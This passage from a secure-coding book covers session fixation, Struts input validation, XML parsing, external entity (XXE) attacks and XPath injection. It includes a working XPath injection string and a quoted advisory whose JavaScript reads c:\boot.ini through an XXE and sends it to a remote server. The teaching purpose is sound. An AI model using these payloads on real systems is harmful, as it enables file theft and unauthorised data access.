rule identifies all calls to HttpSession.invalidate(): Structural rule: FunctionCall fc: (fc.function is [name == "invalidate" and enclosingClass.supers contains [Class: name == "javax.http.servlet.HttpSession"]]) Begin a New Session upon Authentication Always generate a new session when a user authenticates, even if an existing session identifier is already associated with the user. If session identifiers are sufficiently long and sufficiently random, guessing a session identifier is an impractical avenue of attack. But if the 334 Chapter 9 Web Applications application does not generate a new session identifier whenever a user authenticates, the potential exists for a session fixation attack, in which the attacker forces a known session identifier onto a user. In a generic session fixation exploit, an attacker creates a new session in a Web application without logging in and records the associated session identifier. The attacker then causes the victim to authenticate against the server using that session identifier, which results in the attacker gaining access to the user’s account through the active session. Imagine the following scenario: 1. The attacker walks up to a public terminal and navigates to the login page for a poorly built Web application. The application issues a session cookie as part of rendering the login page. 2. The attacker records the session cookie and walks away from the terminal. 3. A few minutes later, a victim approaches the terminal and logs in. 4. Because the application continues to use the same session cookie it originally created for the attacker, the attacker now knows the victim’s session identifier and can take control of the session from another computer. This attack scenario requires several things for the attacker to have a chance at success: access to an unmonitored public terminal, the capability to keep the compromised session active, and a victim interested in logging into the vulnerable application on the public terminal. In most circumstances, the first two challenges are surmountable, given a sufficient investment of time. Finding a victim who is both using a public terminal and interested in logging into the vulnerable application is possible as well, as long as the site is reasonably popular and the attacker is not picky about who the victim will be. For example, a Web e-mail kiosk would be a prime target. An attacker can do away with the need for a shared public terminal if the application server makes it possible to force a session identifier on a user by means of a link on a Web page or in an e-mail message. For instance, Apache Tomcat allows an attacker to specify a session identifier as a URL parameter like this: If the value of the jsessionid parameter refers to an existing session, Tomcat will begin using it as the session identifier. To limit session fixation, a Web application must issue a new session identifier at the same time it authenticates a user. Many application servers make this more difficult by providing separate facilities for managing 9.3 Maintaining Session State 335 authorization and session management. For example, the Java Servlet specification requires a container to provide the URL j_security_check, but it does not require that the container issue a new session identifier when authentication succeeds. This leads to a vulnerability in the standard recommended method for setting up a login page, which involves creating a form that looks like this:
Username: Password:
If the application has already created a session before the user authenticates, some implementations of j_security_check (including the one in Tomcat) will continue to use the already established session identifier. If that identifier were supplied by an attacker, the attacker would have access to the authenticated session. It is worth noting that, by default, Web browsers associate cookies with the top-level domain for a given URL. If multiple applications reside under the same top-level domain, such as and, a vulnerability in one application can allow an attacker to fix the session identifier that will be used in all interactions with any application on the domain If your application needs to maintain state across an authentication boundary, the code in Example 9.13 outlines the session management portion of the authentication process. Note that it creates the new session before authenticating the user to avoid a race condition in which an authenticated user is briefly associated with the old session identifier. Example 9.13 This login method invalidates any existing session and creates a new session before attempting to authenticate the user. public void doLogin(HttpServletRequest request) { HttpSession oldSession = request.getSession(false); if (oldSession != null) { // create new session if there was an old session oldSession.invalidate(); HttpSession newSession = request.getSession(true); // transfer attributes from old to new Enumeration enum = oldSession.getAttributeNames(); while (enum.hasMoreElements()) { Continues 336 Chapter 9 Web Applications String name = (String) enum.nextElement(); Object obj = oldSession.getAttribute(name); newSession.setAttribute(name, obj); } } authenticate(request); // username/password checked here } 9.4 Using the Struts Framework for Input Validation Over the past few years, the Struts Web Application Framework has been the most popular starting point for building Java Web applications that follow the Model-View-Controller (MVC) pattern. Although other frameworks are gaining in popularity, we still see more Struts applications than anything else, so we use Struts to demonstrate the ins and outs of using an MVC framework for input validation. In the MVC pattern, Struts plays the role of the controller, making it responsible for dispatching update requests to the model and invoking the view to display the model to the user. Because Struts adheres to the J2EE standard, it’s easy to use other parts of the J2EE standard (such as EJB and JSP) to implement the Model and View portions of an application. Although our advice in this section is geared specifically toward Struts, the concepts we discuss apply to many Java Web application frameworks that include a validation component, such as JSF, Spring, Tapestry, and WebWork. The bottom line is that using a Web validation framework for security purposes takes some concerted effort. Expect to spend some time thinking through the security implications of the framework. Don’t expect that the defaults will do the right thing for you. This section does a deepdive on Struts so that you’ll have a complete example to work from when you sit down to look at the framework you’re using. The rest of this section assumes that the reader is comfortable with basic Struts concepts. For background reading on Struts, we recommend the Struts home page (, Struts in Action [Husted et. al, 2002], and Programming Jakarta Struts, 2nd Edition [Cavaness, 2004]. Struts has little to offer when it comes to security. It’s not that Struts causes inherent security problems, but simply that it does not have many features that directly address security. Struts does have one major feature that, if used properly, can play an important role in preventing common input validation errors: the Struts Validator. The Validator is meant for checking user input to make sure that it is of appropriate form and content 9.4 Using the Struts Framework for Input Validation 337 before it is turned over to an application’s business logic. For example, the Validator might be used to ensure the following: • Boolean values are only T or F. • Free-form strings are of a reasonable length and composition. • Phone numbers contain exactly 10 digits. The Struts Validator provides a convenient format for specifying these kinds of checks. It also offers a good deal of flexibility around providing feedback to the user when a check fails. For the sake of completeness, we define a few commonly used Struts terms here. This is not intended to be a thorough Struts primer. • An ActionForm object holds data from the HTTP request. • A form bean mapping is a configuration file entry. It maps the name of an ActionForm class to a logical name used in the rest of the Struts configuration files. • An Action class defines an execute() method that is responsible for carrying out the purpose of the request. It usually takes data out of an ActionForm object and uses that data to invoke the appropriate business logic. • An action mapping is a configuration file entry that associates a form bean, an action, and a path. When Struts sees a request, it uses the requested URL to choose the appropriate action mapping, and then populates the form bean specified by the action mapping and uses it to invoke the Action class specified by the action mapping. • A validator form is a configuration file entry that specifies the checks that should be performed before an ActionForm is populated from an HTTP request. The Struts Validator is a necessary part of an input validation strategy, but it is not sufficient by itself. Because Struts validation is performed just after the data arrive at the server, there is usually not enough application context to perfectly differentiate valid input from invalid input. The application must include additional validation in the context of its business logic. The Validator is useful for checking GET and POST parameter values, but it does not provide a way to check cookies and other HTTP headers. You must use a different strategy for validation of names and a values coming from cookies and other HTTP headers. The Validator can be used for clientside validation, too, but client-side validation does not change the need to validate all input on the server. 338 Chapter 9 Web Applications Setting Up the Struts Validator Creating a central framework for input validation is no small task. If your application uses Struts, the Struts Validator is probably the easiest and fastest way to start doing centralized input validation. You should aim for using Struts to consistently validate all form data received from the client. In the Struts configuration file, a typical setup for the Validator looks like this: The configuration file validator-rules.xml contains the definitions of validation functions, called validators. The configuration file validation.xml defines which validators are used for each form and each form field. Older Struts applications might rely on the ActionForm.validate() method to perform input validation. Although it is appropriate to use the validate() method to do specialized and complex types of validation, no matter what the case, all input fields should be validated for basic properties using the Struts Validator. Use the Struts Validator for All Actions By using the Struts Validator, you can ensure that every form request the program accepts is validated. You should use the Struts Validator to perform server-side sanity checks for every Struts Action that accepts parameters. Although it is possible to create a custom input validation system that is just as comprehensive as the Struts Validator, it is difficult to do so correctly and completely. Unless there is some way to mechanically verify that all input fields are being validated, the probability is high that some fields will be overlooked. Do not accept another approach to validation in place of the Struts Validator unless there is an automated way to verify that the replacement framework validates every field on every input form. Consider the need to verify the correctness and completeness of an application’s inputvalidation strategy both at the present time and in the future as the application is maintained and enhanced. Examples 9.14 and 9.15 show how a validation form can be used to sanity-check the input to a simple ActionForm. In this example, the form 9.4 Using the Struts Framework for Input Validation 339 accepts only one parameter, named passwd. The form com.bonsecure. action.LoginAction is bound to a URL path through a form bean and an action mapping, as shown in Example 9.14. Then, in Example 9.15, the validation logic checks that the passwd parameter for PasswdForm is between 6 and 12 characters long, and that it contains only alphanumeric characters. Example 9.14 Entries in struts-config.xml define a form bean and an action mapping. Together these entries establish the URL path for the action and the form that the action accepts. ... ... Example 9.15 This entry in validation.xml defines the validation criteria for the form bean: The passwd parameter must be between 6 and 12 characters long, and it must contain only alphanumeric characters.
Continues 340 min 6 max 12 mask ^[0-9a-zA-Z]+$
Chapter 9 Web Applications Notice that the input field is validated against a minimum and maximum length, and that the contents are checked against a whitelist of knowngood characters. Validating input to all ActionForm objects requires both the code and the configuration to be right. On the configuration side, every form bean used by an ActionForm must have a validation form defined for it. (Whew, that’s a mouthful.) Furthermore, the ActionForm mapping must not disable validation. Disabling validation disables the Struts Validator, as well as any custom validation logic defined by the form. Example 9.16 shows an action form mapping that disables validation. Example 9.16 Don’t do this at home: Setting the validate flag to false disables the Struts Validator. Validation is enabled by default, so you do not need to explicitly set the validate property, as shown in Example 9.17. 9.4 Using the Struts Framework for Input Validation 341 Example 9.17 The validate flag defaults to true, so you do not need to specify a value for it. Turning to the code, an ActionForm must extend one of the following classes: • ValidatorForm • ValidatorActionForm • DynaValidatorActionForm • DynaValidatorForm Extending one of these classes is essential because the Validator works by implementing the validate() method in these classes. Forms derived from the following classes cannot use the Struts Validator: • ActionForm • DynaActionForm There’s one more way to break the Validator: If an ActionForm class defines a custom validate() method, that method must call super.validate(), which might look something like the code in Example 9.18. Does this sound like a lot to keep track of? That’s what static analysis is good at. Example 9.18 If an ActionForm implements the validate() method, it must call super.validate(). public abstract class MyForm extends ValidatorForm { ... public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) { super.validate(mapping, request); this.errors = errors; doSpecialValidation(mapping, request); } } 342 Chapter 9 Web Applications Validate Every Parameter Some applications use the same ActionForm class for more than one purpose. In situations like this, some fields might go unused under some action mappings. It is critical that unused fields be validated even if they are not supposed to be submitted. You should validate every parameter accepted by an ActionForm, including those that are not used by the current Action. Preferably, unused fields should be constrained so that they can be only empty or undefined. If unused fields are not validated, shared business logic in an Action could allow attackers to bypass the validation checks performed for other uses of the form bean. For every bean parameter that an ActionForm class declares, the validator form must have a matching entry. This means cross-checking the configuration against the code. If the ActionForm class declares this method void setPasswd(String s) { passwd = s; } then the validator form should contain a line that looks something like this: We recently looked at an application that allowed users to edit their own user profile. Of course, administrators could edit user profiles, too, with an additional capability: When an administrator edited a user profile, he or she got an additional checkbox that controlled whether to grant administrator privileges to the user. Not surprisingly, the developers had used the same Action and ActionForm for both regular users and for administrators. All a regular user needed to do to become an administrator was add an extra parameter to the profile update request. This is exactly the sort of mistake that could have been prevented with the Struts Validator. Of course, you could also add back-end logic that would check to make sure that only administrators could muck with the administrator bit. So which is the right answer? Both! Struts is an excellent first part of a beltand-suspenders approach to input validation. Use the Validator to make sure that requests look the way you expect them to, but also perform sanity checking on the back end to make sure the actions the system is performing make sense. 9.4 Using the Struts Framework for Input Validation 343 Maintain the Validation Logic Do not leave extraneous ActionForm objects, validation forms, or form fields in your configuration; keep Struts validation logic in sync with the application as it evolves. As bugs are fixed and new features are added, the validation logic will need to be maintained in sync with the rest of the application. One of the down sides to validation with Struts is that it is easy for developers to forget to update validation logic when they make changes to an ActionForm class. One indication that validation logic is not being properly maintained is inconsistencies between the ActionForm and the validation form. Consider the ActionForm in Example 9.19. It defines two fields, startDate and endDate. Now look at a validation form in Example 9.20. It contains the original logic to validate DateRangeForm. The validation form lists a third field: scale. The presence of the third field suggests that DateRangeForm was modified without taking validation into account. Example 9.19 DateRangeForm is a ValidatorForm that defines two fields: startDate and endDate. public class DateRangeForm extends ValidatorForm { String startDate, endDate; public void setStartDate(String startDate) { this.startDate = startDate; } public void setEndDate(String endDate) { this.endDate = endDate; } } Example 9.20 This validation form originally was intended to validate DateRangeForm.
344 Chapter 9 Web Applications This error usually indicates that a developer has done one of three things: • Removed a field from an ActionForm class and failed to update the validation logic • Renamed a field in an ActionForm class and failed to update the validation logic • Made a typographic error either in the name of the validation field or in the ActionForm member name We’ve also come across multiple validation forms with the same name, as shown in Example 9.21, making it somewhere between difficult and impossible to determine how the given form bean will actually be validated. Example 9.21 The Struts Validator allows multiple validation forms to have the same name, but giving two validation forms the same name makes it hard to determine which validation form will be applied.
Our primary worry here is that the developer has either made a typo or allowed the validation logic to get out of sync with the code. Small errors such as this one could be the tip of the iceberg; more subtle validation errors might have crept into the application at the same time. Check to ensure that lengths and field values are still correct. There are also mistakes that are entirely confined to the configuration: If a validation form does not reference any existing form bean mapping, chances are good that the developer either failed to remove an outmoded validation form or, more likely, failed to rename the validation 9.4 Using the Struts Framework for Input Validation 345 form when the name of the form bean mapping changed. Name changes often accompany functionality changes, so if you determine that the names are out of sync, check to see if the validation checks are out of sync, too. Finally, we’ve seen cases in which two validation forms have the same name. This causes the Struts Validator to arbitrarily choose one of the forms to use for input validation and discard the other. There is no guarantee that this decision will correspond to the programmer’s expectations. Static Analysis: The Struts Validator The Struts Validator offers a powerful framework for input validation, but its configuration files can be confusing and hard to keep in sync with the code. Static analysis can help by cross-checking the configuration files with the code. Some of the things you can check include the following: • The validation framework is in use. Configuration rule: File Pattern: struts-config.xml XPath Expresion: /struts-config/plug-in[@classname = 'org.apache.struts.validator.ValidatorPlugIn'] • Validation has not been disabled for any forms. Validation is disabled by setting the validate attribute to false on the action mapping in the Struts configuration file. Configuration rule: File Pattern: struts-config.xml XPath Expression: /struts-config/action-mappings/action[@validate = 'false'] • Custom validation logic does not disable the Validator. (The Validator is disabled when a validate() method does not call super.validate().) Continues 346 Chapter 9 Web Applications Structural rule: Function: name == "validate" and enclosingClass.supers contains [name == "org.apache.struts.validator.ValidatorForm"] and not (callees contains [Function: reaches [Function: name == "validate" and enclosingClass.supers contains [name == "org.apache.struts.validator.ValidatorForm"] ] ] ) Summary Writing a secure Web application is tricky business. You cannot trust any of the data received as part of an HTTP request. Attackers will alter form fields and HTTP headers regardless of any client-side constraints. They will also study the way the client and server components of the application interact, so there is no way to keep a secret in a Web client. The application is responsible for protecting its users from malicious content. Attackers might try to take advantage of cross-site scripting, HTTP response splitting, or open redirects to use the application to transmit attacks to other users. To prevent such attacks, applications should perform output validation in addition to input validation. The HTTP protocol creates opportunities for security problems. For any requests that carry sensitive data, prefer the HTTP POST method to the HTTP GET method because the parameters to a GET request will be liberally cached and stored in log files. But note that both methods send data in the clear, so use cryptography to protect sensitive information. Do not rely on requests arriving in the order you expect; if a different order would benefit attackers, that is the order they will use. To prevent cross-site request forgery, create your own mechanism for determining the provenance of the requests the application receives. Summary 347 If an attacker can learn a user’s session identifier, the attacker can gain control of the user’s session. Make sure that the session identifiers you use are long enough and random enough that attackers cannot guess them. To prevent an attacker from forcing a session identifier on a user, issue a new session identifier as part of the authentication process. Enforce a session idle timeout and a maximum session lifetime. The Struts Validator is an example of an input validation framework that can be used to enforce security constraints on HTTP requests. Interaction among the various components of the Struts framework and the Struts Validator can be confusing, and the confusion can lead to holes in the validation logic. Use static analysis to ensure that all forms and all input fields are constrained by validation checks. This page intentionally left blank 10 XML and Web Services We must all hang together, or most assuredly we will all hang separately. —Benjamin Franklin Extensible Markup Language (XML), Web Services, and Service Oriented Architectures are the latest craze in the software development world. Sometimes the latest craze sticks around for a while; previous waves have brought us optimizing compilers, object-oriented programming, and the graphical user interface. Not every wave makes it, of course. These days we don’t talk much about bubble memory or the gopher protocol. XML defines a simple and flexible syntax. It is, at least in theory, human readable and therefore easier to debug than a binary format. Web Services define a standard means by which XML can be used for communication between applications, essentially providing all the necessary ingredients for a platform-neutral Remote Procedure Call (RPC). Service Oriented Architecture (SOA) refers to a style of design in which interactions between components are made explicit and components are freed of unnecessary interdependencies by using standardized interfaces and communication mechanisms such as Web Services. This trio promises to remedy one of the great and ongoing disappointments in software: lack of reuse. The collective opinion of software developers is that it should be quick and easy to create new applications from large chunks of interoperable code. Similarly, it should be a simple matter to fuse together two data sources on opposite ends of the network and put them behind a single interface. Whether or not we are on the verge of a new era in software reuse, the goal alone is enough to make some security folks cringe. Aside from the fact that security tends to bring with it the glass-half-empty perspective, reducing the amount of time necessary to reuse large bodies of code or entire network services might also reduce the amount of time given to considering security 349 350 Chapter 10 XML and Web Services ramifications of said combinations. It might be easy to glue together System A and System B, but will the combination be secure? Will anyone even stop to ask if the system is secure? This chapter is organized as the title suggests: • Working with XML—Web Services frameworks such as the Apache Axis Project abstract away many of the details of the actual XML exchange from the client application, but even with such a framework in place, it seems that most developers end up manipulating XML directly at some point. For that reason, we begin by looking at issues related to handling XML. • Using Web Services—With the XML discussion in mind, we move on to issues specifically related to Web Services. One of the most visible offshoots of the Web Services concept is Asynchronous JavaScript and XML (Ajax), so we will also use this section to examine a security concern specifically related to Ajax: JavaScript hijacking. 10.1 Working with XML XML looks easy—it’s appealing the same way HTML is appealing. But watch out: XML is one more input validation and representation trap. For starters, XML is harder to parse than it might first appear. Deeply nested tags, entities, and external references can all cause trouble. Then there’s document validation; there are multiple ways to define a document syntax and then validate documents against that syntax, but most parsers default to doing nothing beyond the most primitive validation. When it’s time to pull data out of an XML document, what data-retrieval mechanism would be complete without the potential for injection attacks? Query languages such as XPath can make it easy to process XML, but they can also lead to problems. Use a Standards-Compliant XML Parser Avoid the temptation to roll your own XML parser. The following chunk of XML looks simple enough: sue northwest 10.1 Working with XML 351 It is so simple, in fact, that it might be tempting to pull out names and groups with a regular expression or some other short and sweet piece of one-off code. Resist this temptation. XML looks simple, but the rules for parsing it properly are complicated. To get a feeling for the complexity of parsing XML, consider that Version 2.8.0 of the Apache Xerces-J parser is roughly 178,000 lines of code. A naïve approach to parsing XML can make denial-of-service attacks easy. Although the XML you expect to receive might be straightforward, an attacker could provide you with more than you bargained for. Even if the input you receive contains balanced tags and is otherwise a valid XML document, you might end up processing an extraordinarily large amount of data, or you might get a particularly deep or unusual arrangement of nodes. The following bit of XML shows both deep nesting of name nodes and the strange appearance of a member node inside a group element. ... sue A home-brew parser is more likely to use an excessive amount of memory or run into other unexpected performance bottlenecks when faced with documents that have an unusual shape. At one point, these were significant problems for many widely used parsers, too, but since their inception, XML parsers such as Xerces have come a long way in terms of performance, reliability, and capability to cope with oddly shaped documents. XML entities are another major source of problems. Entities are special name-value pairs that behave much like macros. They begin with an ampersand and end with a semicolon. Commonly used entities include < for “less than” and   for “nonbreaking space.” XML allows a document to define its own set of entities. 352 Chapter 10 XML and Web Services Entities can kill your front end with recursion. A naïve parser can loop forever trying to expand a recursively defined entity. Even more problematic is the fact that entities make it possible to say the same thing in many different ways. This makes it approximately impossible to create an input filter based on blacklisting. It also greatly increases the chance that two different parsers will have slightly different interpretations of the same document. Home-grown parsers can also make mistaken assumptions about characters that might or might not appear in an XML document, such as overlooking the fact that parsing rules are very different inside a CDATA section (where just about any character is legal). This could enable metacharacter attacks against the parser. The answer to the parsing problem: don’t underestimate the parsing problem. You’ll almost always want to reuse an existing parser that has a good track record for standards compliance and for security. We like Xerces. It’s had some security problems, but it appears to have improved as a result. Turn on Validation Validating against an XML schema (or even a DTD) is a good way to limit an attacker’s options. XML was born to be validated. Because the format is so flexible and open-ended, it begs for an equally flexible way to specify the proper format for a class of documents. That specification originally took the form of a Document Type Definition (DTD), but these days, dataexchange applications more commonly use XML Schema, partly because the Simple Object Access Protocol (SOAP) uses XML Schema and SOAP is the basis for many Web Services standards. XML Schema is a better choice from a security perspective too. If you’d like to take a different path entirely, you might also consider the RELAX NG schema language ( Validation isn’t necessary to parse XML, but skipping the validation step gives an attacker increased opportunity to supply malicious input. Because many successful attacks begin with a violation of the programmer’s assumptions, it is unwise to accept an XML document without validating it. 10.1 Working with XML 353 But just because a document is valid XML doesn’t mean it’s tame. Consider the following scenario: The objective is to build an order-processing system that accepts orders that look like this: Magic tricks for all ages 110.95 P. O. Box 510260 St. Louis, MO 63151-0260 USA For such a simple XML document, it doesn’t take more than a few dozen lines of code to extract the data we need. The OrderXMLHandler class in Example 10.1 does just that. The characters() method holds on to each bit of text it sees. The endElement() method stores the text away in the proper variable, depending on the name of the end tag it is processing. When the order is complete (signified by the tag), the endElement method sends off the order data to be processed. The main() method treats each command-line argument as the name of an XML file to be read. Example 10.1 The OrderXMLHandler class doesn’t validate the documents it reads, leaving it vulnerable to maliciously crafted XML. import*; import org.xml.sax.*; import org.xml.sax.helpers.DefaultHandler; import javax.xml.parsers.*; public class OrderXMLHandler extends DefaultHandler { public static void main(String[] args) throws Exception { OrderXMLHandler oxh = new OrderXMLHandler(); SAXParserFactory factory = SAXParserFactory.newInstance(); SAXParser parser = factory.newSAXParser(); for (int i=0; i < args.length; i++) { parser.reset(); parser.parse(new File(args[i]), oxh); } } Continues 354 Chapter 10 XML and Web Services private StringBuffer currentCharacters = new StringBuffer(); private String title; private String price; private String shipTo; public void endElement(String namespaceURI, String simpleName, String qualifiedName) throws SAXException { if ("title".equals(qualifiedName)) { title = currentCharacters.toString(); } else if ("price".equals(qualifiedName)) { price = currentCharacters.toString(); } else if ("shipTo".equals(qualifiedName)) { shipTo = currentCharacters.toString(); } else if ("order".equals(qualifiedName)) { processOrder(title, price, shipTo); } currentCharacters.setLength(0); } public void characters(char buf[], int offset, int len) throws SAXException { currentCharacters.append(new String(buf, offset, len)); } private void processOrder(String title, String price, String shipTo) { ... } And OrderXMLHandler will process the expected input just fine, but unexpected input is a different matter. When it processes the following order XML, the price of the book drops from almost $20 to just a nickel. Magic tricks for all ages 110.95 0.05 P. O. Box 510260 St. Louis, MO 63151-0260 USA The element is not supposed to contain a element embedded within it, but when it does, OrderXMLHandler gets confused and uses the last price it sees. This vulnerability sometimes goes by the name 10.1 Working with XML 355 XML injection because, presumably, the attacker has tricked some frontend system into generating an order document without validating the shipping address, thereby allowing the attacker to inject an unexpected XML tag. It is not reasonable to expect an XML parser to validate the complete semantics of a document’s content. However, a parser can do a complete and thorough job of checking the document’s structure and, therefore, guarantee to the code that processes the document that the content is at least well-formed. A schema definition allows the XML parser to be much more specific about the data types that are allowed to inhabit each tag in the document. Validating the XML you receive is not the end of the inputvalidation job, but it is a very good way to start. The simplest way to ensure that the order document has the form we expect is to validate it against a DTD. The following DTD requires that an order element contain a title, a price, and a shipTo element, and that all those elements are leaf nodes. You can express the same thing in XML Schema as follows: Because XML Schema is currently the more popular choice, we modify OrderXMLHandler to validate against the XML Schema. (Unlike 356 Chapter 10 XML and Web Services most of the examples in this book, the following code relies on interfaces introduced in Java 1.5.) This schema requires that all the tags are present and in the right order, but as long as the title, price, and shipTo elements don’t have any nested tags, it will accept any values for them. After we show how to modify the OrderXMLHandler class to validate against this schema, we come back and tighten up the schema to add stronger validation. To enforce that the order XML matches the schema, two things need to change. First, the OrderXMLHandler class needs to enable validation. Second, it needs to stop processing if validation fails. The main() method enables validation by creating a Schema object and registering it with the parser factory. Example 10.2 shows a new main() method for OrderXMLHandler that enables validation. The easiest way to cause processing to fail when validation fails is to override the error method, also shown in Example 10.2. Changes to the original OrderXMLHandler class are in bold. Example 10.2 Changes to the OrderXMLHandler class to enable validation using XML Schema. public static void main(String[] args) throws Exception { // create schema object String language = XMLConstants.W3C_XML_SCHEMA_NS_URI; SchemaFactory sfactory = SchemaFactory.newInstance(language); StreamSource ss = new StreamSource(new File(ORDER_XSD_FILENAME)); Schema schema = sfactory.newSchema(ss); BasicSAX bs = new BasicSAX(); SAXParserFactory factory = SAXParserFactory.newInstance(); factory.setSchema(schema); SAXParser parser = factory.newSAXParser(); for (int i=0; i < args.length; i++) { parser.reset(); parser.parse(new File(args[i]), bs); } } public void error(SAXParseException e) throws SAXException { throw e; } 10.1 Working with XML 357 With these changes, OrderXMLHandler no longer trusts that the XML is well-formed. If the XML does not match the schema, the order won’t be processed. If enabling validation causes problems because the rules for defining a well-formed document are byzantine or altogether unknown, chances are good that there are also some security problems nearby. If you ask “Why don’t we do validation?” and the answer you get back is “We didn’t write down the schema when we created the format,” then reverse-engineer the schema from a few existing documents. This revised schema in Example 10.3 demonstrates some of the more powerful validation features available with XML Schema. The contents of the price tag are now required to form a decimal number. Both the title and shipTo tags are allowed to contain strings, but the contents must match against a regular expression that limits their possible values. Example 10.3 A more rigorous XML schema for book order documents. 358 Chapter 10 XML and Web Services Be Cautious About External References Consider an attacker’s ability to control processing or otherwise benefit from inserting external references. Returning for a moment to the world of DTDs, a document type declaration typically looks something like this: The last portion of the declaration, the part that reads TR/xhtml1/DTD/strict.dtd, is called the system identifier. It is a URI that both names the DTD and provides a location where the DTD can be found. So how should XML documents be validated? If you can be absolutely 100% certain that every XML document you receive will be generated by someone you trust, upon receiving an XML document you might just go retrieve the DTD pointed to by the system identifier. But because the DTD defines the rules for what makes up a well-formed document, you’ve turned over input validation to the attacker; the fox has been appointed director of henhouse security.1 You’ve also given an attacker an easy way to track the path that the document takes. Every time a new system receives the document, the attacker receives a new request for the DTD. The moral to the story is a broad one: Do not trust external references that arrive cloaked in XML. The system identifier is not the only place external references can appear. The following document shows two entity declarations. The first references a URI, and the second references the filesystem. ]> ... &signature; &signature2; Importing the contents of an arbitrary URI not only allows the attacker to monitor who is looking at the document and when, but it allows the 1. If retrieving the DTD requires accessing the network, you might also be relying upon DNS to retrieve the real DTD, which could leave you vulnerable to a DNS cache poisoning attack. 10.1 Working with XML 359 attacker to change the parsed contents of the document as desired. Referencing the filesystem could allow an attacker to gain information from files that would otherwise be inaccessible. In both cases, this style of foul play is called an XML external entity (XXE) attack [Steuck, 2002]. An External Entity Vulnerability in Adobe Reader In June 2005, Sverre H. Huseby found that Adobe Reader made its users vulnerable to an external entity attack [Huseby, 2005]. Huseby writes: It appears that the XML parser in Adobe Reader can be tricked into reading certain types of local files, and pass them off to other sites. At least it worked with my Adobe Reader 7.0.1 running on Windows XP SP2, and my Adobe Reader 7.0 running on Debian GNU/Linux. A friend of mine confirms that it also works on Mac OSX running Adobe Reader 7.0. Recent versions of Adobe Reader allow inclusion of JavaScript. From those JavaScripts, one may work with XML documents. XML documents may reference External Entities through URIs, and most XML parsers, including the one used in Adobe Reader, will allow access to any URI for External Entities, including files, unless told to do otherwise. To my knowledge, the general “XML External Entity Attack” was first described by Gregory Steuck in a post to Bugtraq in 2002. The following example XML document will make an XML parser read c:\boot.ini and expand it into the content of the foo tag: ]> &xxe; Note how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the foo tag will be the content of c:\boot.ini, and a JavaScript accessing the DOM will be able to extract it. Continues 360 Chapter 10 XML and Web Services Continued Note: The attack is limited to files containing text that the XML parser will allow at the place the External Entity is referenced. Files containing non-printable characters, and files with randomly located less than signs or ampersands, will not be includable. This restriction greatly limits the number of possible target files. The following Adobe Reader-targeted JavaScript contains the above XML, instructs the Adobe Reader XML parser to parse it, and passes the expanded External Entity (i.e., the content of c:\boot.ini) to a remote web server using the system web browser: var xml=" " + " ]>&xxe;"; var xdoc = XMLData.parse(xml, false); app.launchURL("" + "head=Your+boot.ini&text=" + escape(; The remote web server URL points to a script that just displays whatever is sent to it. (Please realize that even if the content of c:\boot.ini is displayed in the local web browser, it has taken a trip to the remote web server before being displayed locally.) With my setup, the web page included the following: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn One can clearly see that the web server got a copy of c:\boot.ini from the local computer. If you want to test, download the PDF file containing the script (created using Scribus), and move the mouse into the empty text field. The script is triggered when the mouse pointer enters the field. A similar PDF fetching the file /etc/passwd is also available, for testing on Unix-like systems. As stated above, the XML parser is rather picky when it comes to the contents of the included file. But it has no problems if the file contains XML, which an increasing number of files appear to do these days. Continuing the OrderXMLHandler class begun in Example 10.2, a program can take charge of resolving its own entities by implementing the resolveEntity method, as shown in Example 10.4. 10.1 Working with XML Example 10.4 A method for resolving external entities in OrderXMLHandler. public InputSource resolveEntity(String publicId, String systemId) throws SAXException { if (ORDER_DTD_SYSTEM_NAME.equals(systemId)) { try { FileInputStream fis = new FileInputStream(PATH_TO_ORDER_DTD)); return new InputSource(fis); } catch (FileNotFoundException e) { throw new SAXException("could not find DTD", e); } } else { throw new SAXException("request for unknown DTD"); } } 361 This code is labeled as both good and bad. It’s good because it prevents external entity attacks. It’s bad because an attacker who completely controls the XML can still bypass validation by providing the DOCTYPE definition inline. The following document does just that: It will pass validation even though it contains an attacker-supplied price reduction. ]> Magic tricks for all ages 110.95 0.25 P. O. Box 510260 St. Louis, MO 63151-0260 USA In the end, XML Schema gives all-around better control over validation than a DTD does. Although you might be able to create a secure system 362 Chapter 10 XML and Web Services using DTD-based validation, XML Schema is both easier to use correctly and more powerful in terms of the properties that can be validated. Keep Control of Document Queries Grubbing around directly in XML tags can be tiresome. Languages such as XPath can take much of the tedium out of manipulating XML, but if attackers can control the contents of XPath query, they could end up with more access than you intended to give them. This attack is known as XPath injection, and both the attack and the vulnerable code constructs look quite similar to SQL Injection. Imagine an XML document that contains a set of ice cream orders: strawberry vanilla chocolate chocolate You might like to write a program that allows someone to look up an ice cream order. If a user can provide the order number and the last name that goes with it, the program should show the correct order. You could write code to directly traverse this XML and search for an order that matches the given parameters, but the code wouldn’t be much fun to write, and it would have little bits of the document schema sprinkled throughout, making it pretty much impossible to reuse and potentially more difficult to maintain. Instead, you could use an XPath query to do the work, as shown in Example 10.5. Example 10.5 Using XPath to look up ice cream orders. public String flavorQuery(String id, String name, String xmlFile) throws XPathExpressionException { XPathFactory xfac = XPathFactory.newInstance(); XPath xp = xfac.newXPath(); InputSource input = new InputSource(xmlFile); String query = "//orders/order[@id='" + id + "' and @name='"+name+"']"; xp.evaluate(query, input); return xp.evaluate(query, input); } 10.1 Working with XML 363 It’s brief, and the knowledge about the schema is centralized in the one statement that assembles the query. This approach will work just fine in simple cases. Set name to Davis and id to 0423, and the XPath query will be this: //orders/order[@id='0423' and @name='Davis'] And flavorQuery() will return strawberry, as expected. By now, we’re sure you see the injection attack coming from a mile away. If the input to flavorQuery() is not properly validated, attackers can read whatever they like from the XML without having to know any order numbers or customer names. Try setting name to be empty ("") and id to be this: ' or .=//orders/order[2] and 'a' = 'a The resulting XPath query is a bit convoluted: //order[@name='' and @id='' or .=//orders/order[2] and 'a' = 'a'] Let’s simplify it. Start by replacing the tautological expression 'a'='a' with the literal true: //order[@name='' and @id='' or .=//orders/order[2] and true] Now note that, in our sample XML document, the name and id attributes are always populated and never blank, so @name='' and @id='' will always evaluate to false. //order[false and false or .=//orders/order[2] and true] As with most programming languages, the and operator has higher precedence than the or operator, so evaluate and operations first: //order[false or .=//orders/order[2]] Now evaluate the or operator: //order[.=//orders/order[2]] 364 Chapter 10 XML and Web Services We are left with an XPath query that says “Match this order node if it happens to be the second child of an orders node.” And sure enough, now flavorQuery() returns vanilla. Attackers can use this technique to read every record from the document one at a 